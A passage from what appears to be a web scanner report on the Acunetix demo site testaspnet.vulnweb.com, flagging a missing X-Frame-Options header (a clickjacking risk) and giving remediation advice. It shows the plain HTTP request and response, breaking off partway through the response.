style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6543 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (6543 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 22723Response body (22723 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2V